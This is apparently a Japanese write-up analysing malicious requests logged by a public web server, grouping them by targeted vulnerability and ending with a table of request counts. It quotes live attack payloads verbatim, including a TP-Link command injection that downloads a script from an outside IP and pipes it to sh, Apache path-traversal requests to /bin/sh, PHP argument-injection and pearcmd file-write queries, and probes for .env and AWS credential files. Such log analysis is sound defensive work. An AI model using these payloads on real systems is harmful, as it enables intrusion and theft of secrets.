公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
ログイン画面へのアクセス
どのサービス化までは特定できませんでしたが、ブルートフォース目的のログイン画面へのアクセスがありました。
/admin/assets/js/views/login.js
wordpressのログイン画面へのアクセスもありました。
/wp-login.php
TP-Link製ルータArcher AX21の脆弱性(CVE-2023-1389)を狙った攻撃
2023年6月度 MBSD-SOCの検知傾向トピックス | 技術者ブログ | 三井物産セキュアディレクション株式会社
/cgi-bin/luci/;stok=/locale
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php
/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php
/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/Util/PHP/eval-stdin.php
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Apacheのパストラバーサルの脆弱性 (CVE-2021-41773、CVE-2021-42013)を利用したシェルの実行
普通にパストラバーサルを試す攻撃がありました。
Apache HTTP Serverのディレクトリトラバーサル脆弱性_CVE-2021-41773_検証 #Apache_http_server - Qiita
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
PHPの脆弱性(CVE-2024-4577)を狙う攻撃
公開からわずか 1 日後に発生した CVE-2024-4577 の悪用
PHPの脆弱性(CVE-2024-4577)を狙う攻撃について | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
Cisco 製 Cisco IOS XE などのネットワーク機器の Web UI の脆弱性
下記の記事のようなネットワーク機器のWeb UIにアクセスを試みる通信だと思われます。
Cisco 製 Cisco IOS XE の Web UI の脆弱性について(CVE-2023-20198 等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
/webui/
GeoServerの脆弱性
GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX:RCE 攻撃が観測されている – IoT OT Security News
/geoserver/web/
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
Faradayの製品の脆弱性
NVD - cve-2024-4584
CVE-2024-4584 Faraday GM8181/GM828x command_port.ini 情報の漏洩
/command_port.ini
phpinfo
/_profiler/phpinfo
/app_dev.php/_profiler/phpinfo
不審な通信の一覧
uri | count |
---|---|
/.env | 632 |
/sw.js | 408 |
/admin/assets/js/views/login.js | 301 |
/cgi-bin/luci/;stok=/locale | 237 |
/ads.txt | 207 |
mstshash=Administr | 194 |
* | 158 |
/.git/config | 151 |
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 150 |
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0 | 133 |
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh | 121 |
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh | 113 |
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input | 108 |
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php | 107 |
/vendor/phpunit/src/Util/PHP/eval-stdin.php | 106 |
/vendor/phpunit/Util/PHP/eval-stdin.php | 106 |
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 105 |
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php | 105 |
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) | 104 |
/phpunit/src/Util/PHP/eval-stdin.php | 103 |
/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 103 |
/phpunit/phpunit/Util/PHP/eval-stdin.php | 103 |
/phpunit/Util/PHP/eval-stdin.php | 102 |
/lib/phpunit/src/Util/PHP/eval-stdin.php | 102 |
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 102 |
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php | 102 |
/lib/phpunit/Util/PHP/eval-stdin.php | 102 |
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/sellers.json | 101 |
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello | 101 |
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello | 101 |
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php | 101 |
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 101 |
/index.php?lang=../../../../../../../../tmp/index1 | 100 |
/wp-login.php | 98 |
/app-ads.txt | 96 |
/login.rsp | 86 |
/.well-known/traffic-advice | 79 |
/index.xml | 70 |
/containers/json | 67 |
//.env | 62 |
/webui/ | 61 |
/geoserver/web/ | 60 |
/actuator/gateway/routes | 59 |
/api/.env | 54 |
/app/.env | 49 |
/command_port.ini | 46 |
/.env.production | 45 |
/backend/.env | 43 |
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 43 |
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js | 41 |
/.json | 41 |
/config.json | 36 |
/admin/.env | 36 |
/app_dev.php/_profiler/open?file=app/config/parameters.yml | 34 |
/_profiler/phpinfo | 32 |
/manifest.js | 31 |
/t4 | 29 |
/.env.prod | 29 |
/info.php | 28 |
/demo/.env | 28 |
/staging/.env | 27 |
/shell?cd+/tmp;rm+-rf+*;wget+ | 27 |
/debug/default/view?panel=config | 27 |
/.env.bak | 27 |
/library/.env | 26 |
/.env.example | 26 |
/dns-query | 23 |
/HNAP1/ | 23 |
/.well-known/security.txt | 23 |
/wp | 22 |
/wordpress | 22 |
/public/.env | 22 |
/post/wp-login.php | 22 |
/new | 22 |
/core/.env | 22 |
/config/.env | 22 |
/app_dev.php/_profiler/phpinfo | 22 |
/phpinfo.php | 21 |
/old | 21 |
/main | 21 |
/infos/ | 21 |
/info/ | 21 |
/home | 21 |
/bk | 21 |
/bc | 21 |
/backup | 21 |
/apps/.env | 21 |
/web/.env | 19 |
/vendor/.env | 19 |
/laravel/.env | 19 |
/.env.dev | 19 |
/actuator/health | 18 |
/HNAP1 | 18 |
/server-status | 17 |
/sdk | 17 |
/index.php | 17 |
//sftp.json | 17 |
//sftp-config.json | 17 |
/web/debug/default/view | 16 |
/tool/view/phpinfo.view.php | 16 |
/frontend/web/debug/default/view | 16 |
/dev/.env | 16 |
/data/.env | 16 |
/config/aws.yml | 16 |
/.env.save | 16 |
/.DS_Store | 16 |
/pinfo.php | 15 |
/login.action | 15 |
/api/geojson?url=file:///etc/hosts | 15 |
/aab8 | 15 |
/.env~ | 15 |
/.env.stage | 15 |
/telescope/requests | 14 |
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties | 14 |
/owa/auth/logon.aspx | 14 |
/owa/ | 14 |
/login | 14 |
/infophp.php | 14 |
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 14 |
/cgi-bin/authLogin.cgi | 14 |
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts | 14 |
/aaa9 | 14 |
/.config.yaml | 14 |
/.aws/credentials | 14 |
/v2/_catalog | 13 |
/owa/auth/x.js | 13 |
/idx_config/ | 13 |
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage | 13 |
/autodiscover/autodiscover.json?@zdi/Powershell | 13 |
/about/site_icons/icon-192x192.png | 13 |
//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js | 13 |
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js | 13 |
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js | 13 |
/.well-known/assetlinks.json | 13 |
/.well-known/apple-app-site-association | 13 |
/.env.development | 13 |
/webui | 12 |
/user | 12 |
/resolve?name=example.com&type=A | 12 |
/resolve | 12 |
/query?name=example.com&type=A | 12 |
/query | 12 |
/media/.env | 12 |
/manager/html | 12 |
/human.aspx | 12 |
/dns-query?name=example.com&type=A | 12 |
/client/.env | 12 |
/aws.yml | 12 |
/about | 12 |
/.vscode/.env | 12 |
/.gitlab-ci/.env | 12 |
/.env.test | 12 |
7 | 11 |
/version | 11 |
/v2/.env | 11 |
/static/.env | 11 |
/stag/.env | 11 |
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ | 11 |
/solr/admin/info/system | 11 |
/solr/admin/cores?action=STATUS&wt=json | 11 |
/query?q=SHOW+DIAGNOSTICS | 11 |
/portal/redlion | 11 |
/new/.env | 11 |
/misc/.env | 11 |
/log/.env | 11 |
/index.asp | 11 |
/images/.env | 11 |
/html/.env | 11 |
/home/.env | 11 |
/exapi/.env | 11 |
/evox/about | 11 |
/docker/.env | 11 |
/doc/.env | 11 |
/cp/.env | 11 |
/client_secrets.json | 11 |
/aab9 | 11 |
/.env.production.local | 11 |
/.env.old | 11 |
/.env.local | 11 |
/.env.development.local | 11 |
/teorema505?t=1 | 10 |
/templates/.env | 10 |
/phpinfos.php | 10 |
/locally/.env | 10 |
/localhost/.env | 10 |
/druid/index.html | 10 |